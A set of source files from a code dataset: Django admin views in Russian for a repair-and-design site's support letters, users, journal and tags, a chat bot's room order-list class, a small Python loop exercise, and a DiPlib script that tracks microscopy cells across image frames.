ActionTypes.objects.get(id=action_type),\n content = 'Ваша заявка на '+ role_name +' была рассмотрена. Решение: '+ decision +' Также ответ от поддержки: «' + answer['answer'] +'». С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'Пишите ещё, если что-то непонятно, или у Вас родилась идея! ❤'\n ).receiver.add(letter.asked_by)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = 'Заявка на '+ role_name +' от пользователя «'+ letter.asked_by.username +'» (подана '+ str(localize(letter.when_asked)) +') обработана пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n if letter_type in [31, 32]:\n if letter_type == 31:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1010201),\n content = 'Ваш вопрос был рассмотрен. Ответ от поддержки: «' + answer['answer'] + '».',\n hover_text = 'Пишите ещё, если что-то непонятно, или у Вас родилась идея! 
❤'\n ).receiver.add(letter.asked_by)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=1010201),\n action_person = request.user,\n action_content = letter.title +' от пользователя «'+ letter.asked_by.username +'» (подан '+ str(localize(letter.when_asked)) +') обработан пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n if letter_type == 32:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1010201),\n content = 'Спасибо Вам за Вашу идею! Идея была рассмотрена. Ответ от поддержки: «' + answer['answer'] + '». С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'Ждём ещё идей! ❤'\n ).receiver.add(letter.asked_by)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=1010201),\n action_person = request.user,\n action_content = letter.title +' от пользователя «'+ letter.asked_by.username +'» (подана '+ str(localize(letter.when_asked)) +') обработана пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n letter.save()\n else:\n answer_form = AnswerForm({'answer': None})\n answer_to_report_form = AnswerToReportForm({'answer': None, 'decision': 'just_answer'})\n\n\n ideas = ContactingSupport.objects.filter(type=32).exclude(answer_content=None)\n new_ideas = ContactingSupport.objects.filter(type=32, answer_content=None)\n new_ideas_count = new_ideas.count()\n all_ideas_photos = ContactingSupportPhotos.objects.filter(contacting_support_action__type=32)\n\n questions = ContactingSupport.objects.filter(type=31).exclude(answer_content=None)\n new_questions = ContactingSupport.objects.filter(type=31, answer_content=None)\n new_questions_count = new_questions.count()\n all_questions_photos = ContactingSupportPhotos.objects.filter(contacting_support_action__type=31)\n\n applications = ContactingSupport.objects.filter(type__in=[21, 22]).exclude(answer_content=None)\n new_applications = ContactingSupport.objects.filter(type__in=[21, 22], answer_content=None)\n new_applications_count = new_applications.count()\n all_applications_photos = ContactingSupportPhotos.objects.filter(contacting_support_action__type__in=[21, 22])\n\n reports = ContactingSupport.objects.filter(type__in=[11, 12]).exclude(answer_content=None)\n new_reports = ContactingSupport.objects.filter(type__in=[11, 12], answer_content=None)\n new_reports_count = new_reports.count()\n all_reports_photos = ContactingSupportPhotos.objects.filter(contacting_support_action__type__in=[11, 12])\n reported_pubs_list_id = [p.ask_additional_info for p in ContactingSupport.objects.filter(type=11)]\n reported_users_list_id = [u.ask_additional_info for u in ContactingSupport.objects.filter(type=12)]\n reported_pubs = Publication.objects.filter(id__in=reported_pubs_list_id)\n reported_users = User.objects.filter(id__in=reported_users_list_id)\n deleted_pubs_in_reports_ids = [id for id in reported_pubs_list_id if not Publication.objects.filter(id=id)]\n deleted_users_in_reports_ids = [id for id in reported_users_list_id if not User.objects.filter(id=id)]\n\n strange_letters = ContactingSupport.objects.filter(type=0).exclude(answer_content=None)\n new_strange_letters = ContactingSupport.objects.filter(type=0, answer_content=None)\n new_strange_letters_count = 
new_strange_letters.count()\n    all_strange_letters_photos = ContactingSupportPhotos.objects.filter(contacting_support_action__type=0)\n\n    title = 'Обращения в поддержку'\n    if new_ideas or new_questions or new_applications or new_reports or new_strange_letters:\n        title = str(new_ideas_count + new_questions_count + new_applications_count + new_reports_count + new_strange_letters_count) + ' обращений ждут ответа | Обращения в поддержку'\n    content = {\n        'answer_form': answer_form,\n        'answer_to_report_form': answer_to_report_form,\n\n        'ideas': ideas,\n        'new_ideas': new_ideas,\n        'new_ideas_count': new_ideas_count,\n        'all_ideas_photos': all_ideas_photos,\n\n        'questions': questions,\n        'new_questions': new_questions,\n        'new_questions_count': new_questions_count,\n        'all_questions_photos': all_questions_photos,\n\n        'applications': applications,\n        'new_applications': new_applications,\n        'new_applications_count': new_applications_count,\n        'all_applications_photos': all_applications_photos,\n\n        'reports': reports,\n        'new_reports': new_reports,\n        'new_reports_count': new_reports_count,\n        'all_reports_photos': all_reports_photos,\n        'reported_pubs': reported_pubs,\n        'reported_users': reported_users,\n        'deleted_pubs_in_reports_ids': deleted_pubs_in_reports_ids,\n        'deleted_users_in_reports_ids': deleted_users_in_reports_ids,\n\n        'strange_letters': strange_letters,\n        'new_strange_letters': new_strange_letters,\n        'new_strange_letters_count': new_strange_letters_count,\n        'all_strange_letters_photos': all_strange_letters_photos,\n\n        'all_new_letters_count': ContactingSupport.objects.filter(answer_content=None).count(),\n        'all_letters_count': ContactingSupport.objects.filter().count(),\n        'title': title,\n    }\n    return render(request, 'adminapp/letters_to_support.html', content)\n\n\n# удалить обращение в поддержку, если оно отвечено\ndef DeleteLetterToSupport(request, pk):\n    if not request.user.is_authenticated:\n        return HttpResponse(\"Сначала авторизуйтесь! Авторизоваться\")\n    if request.user.role.id != 4:\n        return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n\n    if ContactingSupport.objects.filter(id=pk):\n        letter = ContactingSupport.objects.get(id=pk)\n        asked_by_username = ' пользователем «'+ letter.asked_by.username +'»' if letter.asked_by else ''\n        asked_by_username2 = ' от пользователя «'+ letter.asked_by.username +'»' if letter.asked_by else ''\n\n        if letter.answer_content:\n            photos = ContactingSupportPhotos.objects.filter(contacting_support_action=letter)\n            if photos:\n                fs = FileSystemStorage()\n                for photo in photos:\n                    if fs.exists('../media/'+ photo.photo.name):\n                        fs.delete('../media/'+ photo.photo.name)\n\n            Notifications.objects.create(\n                type = ActionTypes.objects.get(id=9920500),\n                content = 'Успешно удалено обращение «' + letter.title + '», отправленное ' + str(localize(letter.when_asked)) + asked_by_username,\n                hover_text = \"Освобождать память сервера -- это круто! Молодцы)\"\n            ).receiver.add(request.user)\n\n            JournalActions.objects.create(\n                type = ActionTypes.objects.get(id=9920500),\n                action_person = request.user,\n                action_content = 'Удалено обращение в поддержку «'+ letter.title +'»'+ asked_by_username2 +' пользователем «'+ request.user.username +'».',\n                action_subjects_list = '[user «'+ request.user.username +'». 
(id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n            )\n            letter.delete()\n        else:\n            Notifications.objects.create(\n                type = ActionTypes.objects.get(id=9920501),\n                content = 'Не может быть удалено обращение «' + letter.title + '», отправленное ' + str(localize(letter.when_asked)) + asked_by_username +', поскольку оно ещё не было отвечено.',\n                hover_text = \"Освобождать память сервера -- это круто! Молодцы) Но на обращения нужно сперва отвечать!\"\n            ).receiver.add(request.user)\n\n            JournalActions.objects.create(\n                type = ActionTypes.objects.get(id=9920501),\n                action_person = request.user,\n                action_content = 'Попытка удаления неотвеченного обращения в поддержку «'+ letter.title +'»'+ asked_by_username2 +' пользователем «'+ request.user.username +'».',\n                action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n            )\n\n    return redirect('admin_mine:letters_to_support')\n\n\n# страница всех публикаций в ИС\nclass PubList(ListView):\n    model = Publication\n    template_name = 'adminapp/publications.html'\n\n    def get(self, *args, **kwargs):\n        if not self.request.user.is_authenticated or not self.request.user.role.id in [3, 4]:\n            print('проникновение туда, куда нельзя')\n            return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n        else:\n            resp = super().get(*args, **kwargs)\n            return resp\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        title ='Публикации | Панель администратора'\n        pubs = Publication.objects.filter(type__id__in=[11, 21, 31])\n        saved_urls = SavedPubs.objects.filter(pub__in = pubs)\n        seen_urls = SeenPubs.objects.filter(pub__in = pubs)\n        new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n        print(seen_urls)\n        for su in seen_urls:\n            print(su.pub)\n            print(su.watcher)\n            print(su.watcher.id)\n            print(su.count)\n\n        data = {\n            'title': title,\n            'pubs': pubs,\n            'saved_urls': saved_urls,\n            'seen_urls': seen_urls,\n            'new_letters_to_support_count': new_letters_to_support_count,\n        }\n        return data\n\n\n# страница всех пользователей в ИС\nclass UserList(ListView):\n    model = User\n    template_name = 'adminapp/users.html'\n\n    def get(self, *args, **kwargs):\n        if not self.request.user.is_authenticated or not self.request.user.role.id in [3, 4]:\n            print('проникновение туда, куда нельзя')\n            return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n        else:\n            resp = super().get(*args, **kwargs)\n            return resp\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        title ='Пользователи | Панель администратора'\n        users = User.objects.filter().order_by('-last_entry')\n        saved_urls = SavedPubs.objects.filter()\n        seen_urls = SeenPubs.objects.filter()\n        new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n        data = {\n            'title': title,\n            'users': users,\n            'saved_urls': saved_urls,\n            'seen_urls': seen_urls,\n            'new_letters_to_support_count': new_letters_to_support_count,\n        }\n        return data\n\n\n# страница статистики отдельного пользователя в ИС (как просили на предзащите)\ndef UserIndividual(request, pk):\n    if not request.user.is_authenticated:\n        return redirect('main')\n    if request.user.role.id not in [3, 4]:\n        print('проникновение туда, куда нельзя')\n        return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. 
На главную\")\n\n    opened_user = User.objects.get(id=pk)\n    title ='Пользователь «'+ opened_user.username +'» | Панель администратора'\n    saved_urls = SavedPubs.objects.filter(saver=opened_user)\n    seen_urls = SeenPubs.objects.filter(watcher=opened_user)\n    new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n    JournalActions.objects.create(\n        type = ActionTypes.objects.get(id=4010200),\n        action_person = request.user,\n        action_content = 'Просмотрена страница пользователя «'+ opened_user.username +'» пользователем «'+ request.user.username +'».',\n        action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [opened_user «'+ opened_user.username +'». (id: '+ str(opened_user.id) +')]'\n    )\n\n    context = {\n        'title': title,\n        'opened_user': opened_user,\n        'saved_urls': saved_urls,\n        'seen_urls': seen_urls,\n        'new_letters_to_support_count': new_letters_to_support_count,\n    }\n    return render(request, 'adminapp/user_individual.html', context)\n\n\n# страница журнала всех событий в ИС\nclass JournalList(ListView):\n    model = JournalActions\n    template_name = 'adminapp/journal.html'\n\n    def get(self, *args, **kwargs):\n        if not self.request.user.is_authenticated or not self.request.user.role.id in [3, 4]:\n            print('проникновение туда, куда нельзя')\n            return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n        else:\n            resp = super().get(*args, **kwargs)\n            return resp\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        title ='Журнал всех событий в ИС | Панель администратора'\n        journal = JournalActions.objects.filter().order_by('-when')\n        new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n        data = {\n            'title': title,\n            'journal': journal,\n            'new_letters_to_support_count': new_letters_to_support_count,\n        }\n        return data\n\n\n# отображение, создание,\n# редактирование и удаление тегов и их категорий\n@csrf_exempt\ndef TagsAndTagCategories(request):\n    if not request.user.is_authenticated:\n        return HttpResponse(\"Сначала авторизуйтесь! Авторизоваться\")\n    if not request.user.role.id in [4]:\n        return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n\n    errors = ''\n    if request.method == 'POST':\n        object = None\n        method_POST = request.POST\n\n        if (\n            'to_create_or_edit' in method_POST and 'tag_or_category_to_create_or_edit' in method_POST and 'category_or_tag_name' in method_POST\n            and method_POST['to_create_or_edit'] and method_POST['tag_or_category_to_create_or_edit'] and method_POST['category_or_tag_name']\n        ):\n            # список типов публикаций нужен и для категорий, и для тегов (иначе NameError в ветке редактирования тега)\n            selected_pub_types = [method_POST[item] for item in method_POST.keys() if 'pub_type_' in item]\n\n            if method_POST['tag_or_category_to_create_or_edit'] == 'category':\n\n                if method_POST['to_create_or_edit'] == 'create':\n                    action_type = 2010200\n                    if not TagCategory.objects.filter(name=method_POST['category_or_tag_name']) and selected_pub_types:\n                        object = TagCategory.objects.create(name=method_POST['category_or_tag_name'])\n                        object.pub_type.set(PubTypes.objects.filter(id__in=selected_pub_types))\n                        object_type = 'создана категория «'+ object.name +'»'\n                    else:\n                        message = 'Для создания категории не всё заполнено!'\n                        errors += message if not errors else '
' + message\n\n if method_POST['to_create_or_edit'] == 'edit':\n action_type = 2010201\n if 'object_id' in method_POST and method_POST['object_id'] and selected_pub_types and TagCategory.objects.filter(id=method_POST['object_id']):\n object = TagCategory.objects.get(id=method_POST['object_id'])\n if object.name != method_POST['category_or_tag_name']:\n object.name = method_POST['category_or_tag_name']\n object.pub_type.set(PubTypes.objects.filter(id__in=selected_pub_types))\n object.save()\n object_type = 'изменена категория «'+ object.name +'»'\n else:\n message = 'Для редактирования категории не всё заполнено!'\n errors += message if not errors else '
' + message\n\n if method_POST['tag_or_category_to_create_or_edit'] == 'tag':\n\n if method_POST['to_create_or_edit'] == 'create':\n action_type = 2011200\n if 'category' in method_POST and method_POST['category'] and not Tag.objects.filter(name=method_POST['category_or_tag_name'], category=method_POST['category']):\n object = Tag.objects.create(\n name=method_POST['category_or_tag_name'],\n category=TagCategory.objects.get(id=method_POST['category'])\n )\n object.save()\n object_type = 'создан тег «'+ object.name +'»'\n else:\n message = 'Для создания тега не всё заполнено!'\n errors += message if not errors else '
' + message\n\n if method_POST['to_create_or_edit'] == 'edit':\n action_type = 2011201\n if 'object_id' in method_POST and method_POST['object_id'] and 'category' in method_POST and selected_pub_types and method_POST['category'] and Tag.objects.filter(id=method_POST['object_id']):\n object = Tag.objects.get(id=method_POST['object_id'])\n if object.name != method_POST['category_or_tag_name'] or object.category.id != int(method_POST['category']) or set(object.pub_type.all()) != set(PubTypes.objects.filter(id__in=selected_pub_types)):\n object.name = method_POST['category_or_tag_name']\n object.category = TagCategory.objects.get(id=method_POST['category'])\n object.save()\n object_type = 'изменён тег «'+ object.name +'»'\n else:\n message = 'Для редактирования тега не всё заполнено!'\n errors += message if not errors else '
' + message\n\n if object:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Успешно '+ object_type +'!',\n hover_text = 'Наверное умничкааа) А других уведомить и желательно ещё причину и возможности указать? А?',\n url = reverse('admin_mine:tags_and_tag_categories'),\n url_text = 'Теги и их категории'\n ).receiver.add(request.user)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = object_type.capitalize() +' пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [tag_or_tag_category «'+ str(object) +'» (id: '+ str(object.id) +')]',\n )\n\n if 'tag_or_category_to_delete' in method_POST and 'object_id' in method_POST and method_POST['tag_or_category_to_delete'] and method_POST['object_id']:\n if method_POST['tag_or_category_to_delete'] == 'category':\n action_type = 2010999\n object = TagCategory.objects.filter(id=method_POST['object_id'])\n if object:\n object = TagCategory.objects.get(id=method_POST['object_id'])\n object_type = 'удалена категория «'+ object.name +'»'\n\n if method_POST['tag_or_category_to_delete'] == 'tag':\n action_type = 2011999\n object = Tag.objects.filter(id=method_POST['object_id'])\n if object:\n object = Tag.objects.get(id=method_POST['object_id'])\n object_type = 'удалён тег «'+ object.name +'»'\n\n if object:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Успешно '+ object_type +'!',\n hover_text = 'Ну и зачем? А других уведомить и желательно ещё причину указать? А?',\n url = reverse('admin_mine:tags_and_tag_categories'),\n url_text = 'Теги и их категории'\n ).receiver.add(request.user)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = object_type.capitalize() +' пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». 
(id: '+ str(request.user.id) +')], [tag_or_tag_category «'+ str(object) +'» (id: '+ str(object.id) +')]',\n )\n\n object.delete()\n\n title = 'Теги публикаций и их категории'\n tags = Tag.objects.all()\n tag_categories = TagCategory.objects.all()\n pubs = Publication.objects.filter(type__in=[11, 21, 31])\n pub_types = PubTypes.objects.filter(id__in=[11, 21, 31])\n new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n content = {\n 'title': title,\n 'tags': tags,\n 'tag_categories': tag_categories,\n 'pubs': pubs,\n 'pub_types': pub_types,\n 'errors': errors,\n 'new_letters_to_support_count': new_letters_to_support_count,\n }\n return render(request, 'adminapp/tags_and_tag_categories.html', content)\n","repo_name":"todrgor/repair_design_fields_DJANGO","sub_path":"adminapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":51402,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"17717696355","text":"from response import Response\nfrom preodb import PreoDB\n\nclass RoomOrder:\n def __init__(self, db_path=PreoDB.DEFAULT_DB_PATH):\n self.preo_db = PreoDB(db_path)\n\n def new_order(self, room_id, list_name):\n if self.preo_db.is_room_order_exist(room_id):\n # Room order has already been created.\n return Response.text(Response.REP_DUP_ORDERLIST)\n\n self.preo_db.new_room_order(room_id, list_name)\n return Response.text(Response.REP_NEW_ORDERLIST_CREATED, list_name)\n\n def set_item(self, room_id, user_name, item_name, amount):\n if not self.preo_db.is_room_order_exist(room_id):\n # Room order has not been created yet.\n print(\"Error: room order %s does not exist\" % (room_id))\n return None\n\n if not self.preo_db.is_room_order_enable(room_id):\n # Room order is not enabled.\n print(\"Error: room order %s is not enabled\" % (room_id))\n return Response.text(Response.REP_ORDERLIST_ALREADY_CLOSED)\n\n self.preo_db.set_order(room_id, user_name, item_name, amount)\n return Response.text(Response.REP_SET_ITEM, user_name, item_name, amount)\n\n def delete_item(self, room_id, user_name, item_name):\n if not self.preo_db.is_room_order_exist(room_id):\n # Room order has not been created yet.\n print(\"Error: room order %s does not exist\" % (room_id))\n return None\n\n if not self.preo_db.is_room_order_enable(room_id):\n # Room order is not enabled.\n print(\"Error: room order %s is not enabled\" % (room_id))\n return Response.text(Response.REP_ORDERLIST_ALREADY_CLOSED)\n if not self.preo_db.get_order_by_user_item(room_id, user_name, item_name):\n # Item does not exist.\n print(\"Error: item %s for %s does not exist in %s\" % (item_name, user_name, room_id))\n return Response.text(Response.REP_DEL_NOT_EXIST_ITEM, user_name, item_name)\n\n self.preo_db.del_order(room_id, user_name, item_name)\n return Response.text(Response.REP_DEL_ITEM, user_name, item_name)\n\n def list_order(self, room_id):\n room_order = self.preo_db.get_room_order(room_id)\n if room_order == None:\n # Room order has not been created yet.\n print(\"Error: room order %s does not exist\" % (room_id))\n return None\n\n order_list = self.preo_db.get_order_by_room(room_id)\n text = self.__order_list_to_str(order_list)\n return Response.text(Response.REP_SUMMARY_ORDERLIST, room_order.list_name, text)\n\n def close_order(self, room_id):\n if not self.preo_db.is_room_order_exist(room_id):\n # Room order has not been created yet.\n print(\"Error: room order %s does not exist\" % (room_id))\n return None\n\n if not 
self.preo_db.is_room_order_enable(room_id):\n            # Room order has already been disabled.\n            return Response.text(Response.REP_ORDERLIST_ALREADY_CLOSED)\n\n        self.preo_db.disable_room_order(room_id)\n        return Response.text(Response.REP_ORDERLIST_CLOSED)\n\n    def open_order(self, room_id):\n        if not self.preo_db.is_room_order_exist(room_id):\n            # Room order has not been created yet.\n            print(\"Error: room order %s does not exist\" % (room_id))\n            return None\n\n        if self.preo_db.is_room_order_enable(room_id):\n            # Room order has already been enabled.\n            return Response.text(Response.REP_ORDERLIST_ALREADY_OPENED)\n\n        self.preo_db.enable_room_order(room_id)\n        return Response.text(Response.REP_OPEN_ORDERLIST)\n\n    def is_order_opened(self, room_id):\n        if not self.preo_db.is_room_order_exist(room_id):\n            # Room order has not been created.\n            return False\n\n        return self.preo_db.is_room_order_enable(room_id)\n\n    def end_order(self, room_id):\n        room_order = self.preo_db.get_room_order(room_id)\n        if room_order == None:\n            # Room order has not been created.\n            print(\"Error: room order %s does not exist\" % (room_id))\n            return None\n\n        order_list = self.preo_db.get_order_by_room(room_id)\n        text = self.__order_list_to_str(order_list)\n        self.preo_db.del_room_order(room_id)\n\n        return Response.text(Response.REP_END_ORDERLIST, room_order.list_name, text)\n\n    @staticmethod\n    def __order_print_user_item_amount(order):\n        return \"%s: %s %s\" % (order.user_name, order.item_name, order.amount)\n\n    @staticmethod\n    def __order_list_to_str(order_list):\n        # Creating a dict mapping item name into a list of user texts and the total amount\n        # ex. \"milk\" : ([\"user1\", \"user3(2)\"], 3)\n        order_dict = {}\n        for order in order_list:\n            item_name = order.item_name\n            amount = order.amount\n            text = order.user_name if amount == 1 else \"%s(%d)\" % (order.user_name, amount)\n            if item_name in order_dict:\n                order_dict[item_name][0].append(text)\n                order_dict[item_name][1] += amount\n            else:\n                order_dict[item_name] = [[text], amount]\n\n        order_text = \"\"\n        for item_name, args in order_dict.items():\n            order_text += \"%s %d: %s\\n\" % (item_name, args[1], \" \".join(args[0]))\n        return order_text.strip()\n\n\"\"\" deprecated code, kept for reference\nclass Order:\n    def __init__(self, name):\n        self.name = name\n        self.enable = True\n        self.order_by_menu = {}\n        self.order_by_user = {}\n\n    def add_order(self, user, menu, amount=1):\n        if self.enable:\n            return Response.text(Response.REP_NOT_IMPLEMENT)\n        else:\n            return Response.text(Response.REP_ORDERLIST_CLOSED, self.name)\n\n    def del_order(self, user, menu, amount=-1):\n        if self.enable:\n            return Response.text(Response.REP_NOT_IMPLEMENT)\n        else:\n            return Response.text(Response.REP_ORDERLIST_CLOSED, self.name)\n\n    def set_enable(self, flag):\n        self.enable = flag\n\n    def order_by_menu_string(self):\n        text = \"\"\n        for menu, amount in self.order_by_menu:\n            text += \"%s %d\" % (menu, amount) + \"\\n\"\n        return text[:-1]\n\n    def order_by_user_string(self):\n        text = \"\"\n        for user, order in self.order_by_user:\n            text += user + \"\\n\"\n            for menu, amount in order:\n                text += menu + \" \" + amount + \"\\n\"\n        return text[:-1]\n\n    def list_order_by_menu(self):\n        return Response.text(Response.REP_ORDER_PRINT, self.name, self.order_by_menu_string)\n\n    def list_order_by_user(self):\n        return Response.text(Response.REP_ORDER_PRINT, self.name, self.order_by_user_string)\n\n    def __str__(self):\n        return 
self.order_by_user_string()\n\"\"\"\n","repo_name":"mexeniz/preo-bot","sub_path":"bot/roomorder.py","file_name":"roomorder.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"25220910663","text":"data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n# for文を使って合計を求める\ntotal = 0\nfor h in data:\n total += h\n\nprint(total)\n\n# data の中から偶数だけ表示する\nfor a in data:\n if a % 2 == 0:\n print(a)","repo_name":"s16009/PythonTutorial","sub_path":"hukusyu/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10098266153","text":"import numpy as np\nimport diplib as dip\nfrom diplib import PyDIPjavaio\nimport math\n\nfrom util.common_util import CommonUtil\nfrom util.image_util import ImageUtil\nfrom util.plot_util import PlotUtil\nfrom all_asm.asm4.model.cell import Cell\n\n\n# Save images that display past and current center position of every selected cell\ndef save_image_cell_movement_per_transition(image_sizes_values, x_1_value, y_1_value, x_2_value, y_2_value, series_name, cells_list, sequence_number):\n # Create new empty image\n selected_cell_image = dip.Image((image_sizes_values[0], image_sizes_values[1]), 1)\n selected_cell_image.Fill(0)\n\n # Draw past position and current position of cell\n dip.DrawBox(selected_cell_image, [1, 1], [x_1_value, y_1_value])\n dip.DrawBox(selected_cell_image, [2, 2], [x_2_value, y_2_value])\n\n CommonUtil.save_image_to_default_project_folder(selected_cell_image, \"asm4\",\n \"track_\" + series_name + \"_\" + cells_list[\n i].cell_display_name + \"_from_\" + str(\n sequence_number - 1) + \"_to_\" + str(sequence_number) + \".tif\")\n\n\n# Segment to retrieve brightest cells in image\ndef segment_brightest_cells(img, image_file_name):\n img = dip.ContrastStretch(img, 97, 100)\n\n print(img.Sizes())\n\n segm_img = ImageUtil.segment_image_white(img)\n\n print(segm_img.Sizes())\n\n file_name = image_file_name + '_segmented.tif'\n CommonUtil.save_image_to_default_project_folder(segm_img, \"asm4\", file_name)\n\n labeled_img = dip.Label(segm_img, boundaryCondition=[\"remove\"])\n\n return labeled_img\n\n\n# Save image that shows all initial center positions of selected cells\ndef save_image_initial_selection(sorted_measurements, image_name):\n # Create new empty image\n selected_cells_image = dip.Image((image_sizes[0], image_sizes[1]), 1)\n selected_cells_image.Fill(0)\n\n for i in range(15):\n # Get coordinates of centers of current cell\n x_coord = sorted_measurements[i][2]\n y_coord = sorted_measurements[i][3]\n # Draw center of current cell\n dip.DrawBox(selected_cells_image, [2, 2], [x_coord, y_coord])\n\n CommonUtil.save_image_to_default_project_folder(selected_cells_image, \"asm4\", image_name)\n\n\ndef create_new_empty_images_for_selected_cells(image_sizes_values):\n image_list = []\n\n for _ in range(15):\n new_image = dip.Image((image_sizes_values[0], image_sizes_values[1]), 1)\n new_image.Fill(0)\n image_list.append(new_image)\n\n return image_list\n\n\ndef save_movement_images_selected_cells_series(image_series, series_name):\n for i in range(15):\n CommonUtil.save_image_to_default_project_folder(image_series[i], \"asm4\", \"track_\" + series_name + \"_cell\" + str(i) + \".tif\")\n\n\nif __name__ == '__main__':\n input_dir: str = CommonUtil.obtain_project_default_input_dir_path() + 'asm4/'\n\n image_series_names = ['MTLn3+EGF', 
'MTLn3-ctrl']\n\n for image_series_name in image_series_names:\n\n first_image = ImageUtil.obtain_diplib_image(image_series_name + '0000.png', input_dir)\n image_sizes = first_image.Sizes()\n\n selected_cells = []\n\n images_movement_trajectories_list = create_new_empty_images_for_selected_cells(image_sizes)\n\n for sequence in range(30):\n image_file_name = image_series_name + str(sequence).zfill(4)\n curr_img = ImageUtil.obtain_diplib_image(image_file_name + '.png', input_dir)\n\n # Segment to get only brightest cells in foreground\n labeled_img = segment_brightest_cells(curr_img, image_file_name)\n\n # Measure size and centers of cells\n measurements = np.array(dip.MeasurementTool.Measure(labeled_img, curr_img, ['Size', 'Perimeter', 'Center']))\n # Sort array based on size of cells (descending)\n sorted_measurements = np.flipud(measurements[np.argsort(measurements[:, 0])])\n\n # First image of the series\n if sequence == 0:\n save_image_initial_selection(sorted_measurements, image_file_name + '_initial_selection.tif')\n\n for i in range(15):\n size = sorted_measurements[i][0]\n perimeter = sorted_measurements[i][1]\n\n x_coord = sorted_measurements[i][2]\n y_coord = sorted_measurements[i][3]\n\n current_cell = Cell(i)\n current_cell.cell_display_name = \"cell\" + str(i)\n current_cell.x_y_coord_tuple = (x_coord, y_coord)\n current_cell.perimeter = perimeter\n current_cell.area = size\n\n selected_cells.append(current_cell)\n\n # Draw square for starting position of current selected cell\n dip.DrawBox(images_movement_trajectories_list[i], [4, 4], [x_coord, y_coord])\n\n # Consecutive images of the series\n else:\n for i in range(len(selected_cells)):\n # print(selected_cells[i].cell_display_name, \", \", selected_cells[i].area, \", \", selected_cells[i].perimeter, \", \", selected_cells[i].cell_xy_coord_tuple)\n\n # Past position\n x_1 = selected_cells[i].x_y_coord_tuple[0]\n y_1 = selected_cells[i].x_y_coord_tuple[1]\n\n # Save lowest euclidean distance\n lowest_eucl_dist = image_sizes[0]\n # Save index of cell information with lowest euclidean distance\n index_lowest_dist = 0\n\n for j in range(len(sorted_measurements)):\n x_2 = sorted_measurements[j][2]\n y_2 = sorted_measurements[j][3]\n\n eucl_dist = math.sqrt((x_2 - x_1)**2 + (y_2 - y_1)**2)\n\n if eucl_dist < lowest_eucl_dist:\n lowest_eucl_dist = eucl_dist\n index_lowest_dist = j\n\n # print(sorted_measurements[index_lowest_dist])\n\n # Current position\n x_2 = sorted_measurements[index_lowest_dist][2]\n y_2 = sorted_measurements[index_lowest_dist][3]\n\n selected_cells[i].x_y_coord_tuple = (x_2, y_2)\n selected_cells[i].area = sorted_measurements[index_lowest_dist][0]\n selected_cells[i].perimeter = sorted_measurements[index_lowest_dist][1]\n\n dip.DrawLine(images_movement_trajectories_list[i], [int(x_1), int(y_1)], [int(x_2), int(y_2)])\n\n # save_image_cell_movement_per_transition(image_sizes, x_1, y_1, x_2, y_2, image_series_name, selected_cells, sequence)\n\n save_movement_images_selected_cells_series(images_movement_trajectories_list, image_series_name)\n\n\n\n\n\n\n","repo_name":"wilsonwcyiu/210418_iaim_group_asm","sub_path":"all_asm/asm4/segm_test_rosa.py","file_name":"segm_test_rosa.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30785143569","text":"import datetime as dt\n\nimport telegram\n\nfrom . 
